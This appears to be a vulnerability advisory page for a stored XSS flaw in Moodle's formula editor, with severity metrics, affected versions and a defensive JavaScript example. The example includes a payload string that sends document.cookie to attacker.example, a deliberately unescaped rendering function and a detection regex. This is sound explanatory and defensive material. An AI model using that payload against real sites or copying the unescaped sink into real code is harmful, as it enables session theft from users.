CVE-2025-67850
CVE-2025-67850 is a medium-severity vulnerability with a CVSS 3.1 base score of 6.1. The flaw is in Moodle: a Cross-Site Scripting (XSS) weakness caused by insufficient checks on user-provided data in the formula editor's arithmetic expression fields. EPSS estimates a 0.29% probability of exploitation in the next 30 days.
Description
A flaw was found in Moodle. This vulnerability, a Cross-Site Scripting (XSS) weakness, is caused by insufficient checks on user-provided data in the formula editor's arithmetic expression fields. A remote attacker could inject HTML or script into these fields; when other users view the stored expressions, the injected script executes in their browsers in the context of the Moodle site, potentially exposing their data or performing actions on their behalf. Exploitation therefore requires a victim to view the expression (CVSS UI:R) but no privileges on the attacker's side (PR:N).
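The mechanism described above, as an added example that is not Moodle's code and does not reproduce the actual affected code path: a rendering function that interpolates the stored expression field straight into markup, beside a hardened version that allowlists the arithmetic grammar when the value is saved and HTML-escapes it on output. It is written in JavaScript for illustration; the same two checks belong server-side in Moodle's PHP. The field name, the surrounding markup, the `{var}` placeholder syntax and the payload are assumptions.

```javascript
// Added example, not Moodle's code. Shows why an arithmetic-expression field
// that is interpolated into page markup without checks is a stored XSS sink,
// and two server-side checks that close it. Field name, markup, the {var}
// placeholder syntax and the payload are constructed for illustration.

// Constructed inputs: a legitimate expression and an injected payload.
const LEGIT_EXPRESSION = "({a} + {b}) * 2 / 3.5";
const XSS_PAYLOAD =
  '1+1<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// VULNERABLE: the stored field is dropped straight into the HTML sent to
// whoever views the expression, so any tag in it becomes live markup.
function renderVulnerable(expr) {
  return `<span class="formula-expression">${expr}</span>`;
}

// Check 1: a lexical allowlist. An arithmetic expression may only contain
// numbers, {variable} placeholders, the operators + - * / ^, parentheses
// and whitespace. A sticky regex is used as a tokenizer so that every
// character is accounted for and there is no backtracking blow-up.
function isValidExpression(expr) {
  if (typeof expr !== "string" || expr.length === 0 || expr.length > 1000) {
    return false;
  }
  const token = /\s+|\d+(?:\.\d+)?|\{[A-Za-z_]\w*\}|[-+*/^()]/y;
  let pos = 0;
  let depth = 0;
  while (pos < expr.length) {
    token.lastIndex = pos;
    const m = token.exec(expr);
    if (m === null) {
      return false; // character outside the allowlist, e.g. '<' or '"'
    }
    if (m[0] === "(") depth += 1;
    if (m[0] === ")" && --depth < 0) return false; // unbalanced ')'
    pos = token.lastIndex;
  }
  return depth === 0;
}

// Check 2: HTML-escape on output, regardless of validation (defence in depth;
// Moodle's own s() helper plays this role in PHP).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: reject anything outside the grammar when the expression is saved,
// and escape whatever is rendered.
function renderHardened(expr) {
  if (!isValidExpression(expr)) {
    throw new Error("rejected: not an arithmetic expression");
  }
  return `<span class="formula-expression">${escapeHtml(expr)}</span>`;
}

// Crude detector for reviewing stored values or rendered output: flags a
// <script> tag or any tag carrying an on*= event-handler attribute.
function containsActiveContent(html) {
  return /<script/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}
```

The allowlist is lexical only: it guarantees the stored value cannot carry markup, not that the expression is syntactically complete, which is the job of the formula evaluator that consumes it. The escaping step stays in place even after validation so that a later change to the grammar cannot silently reopen the sink.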
Metrics
CVSS 3.1 base score: 6.1 (Medium)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Decoded: attack vector Network, attack complexity Low, privileges required None, user interaction Required (a victim must view the injected expression), scope Changed (the script runs in the victim's browser rather than in the vulnerable component), confidentiality and integrity impact Low, availability impact None.
Weakness Enumeration
Cross-Site Scripting (XSS); the standard CWE for this weakness class is CWE-79, Improper Neutralization of Input During Web Page Generation.
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Moodle | Moodle | < 4.1.22 |
| Moodle | Moodle | >= 4.4.0, < 4.4.11 |
| Moodle | Moodle | >= 4.5.0, < 4.5.8 |
| Moodle | Moodle | >= 5.0.0, < 5.0.4 |
| Moodle | Moodle | 5.1.0 |
References
- https://access.redhat.com/security/cve/CVE-2025-67850 (Third Party Advisory)
- https://bugzilla.redhat.com/show_bug.cgi?id=2423838 (Issue Tracking, Third Party Advisory)
Frequently Asked Questions
What is CVE-2025-67850?
A stored Cross-Site Scripting (XSS) vulnerability in Moodle, caused by insufficient checks on user-provided data in the formula editor's arithmetic expression fields. Script injected into such a field runs in the browser of any user who views the expression.
How severe is CVE-2025-67850?
Medium: CVSS 3.1 base score 6.1 (network-reachable, no privileges required, victim interaction required, low confidentiality and integrity impact, no availability impact). EPSS estimates a 0.29% chance of exploitation within 30 days.
How do I fix CVE-2025-67850?
Upgrade Moodle to a release outside the affected ranges listed above: 4.1.22, 4.4.11, 4.5.8 or 5.0.4 or later on their respective branches. 5.1.0 is listed as affected.
Source: NVD / NIST
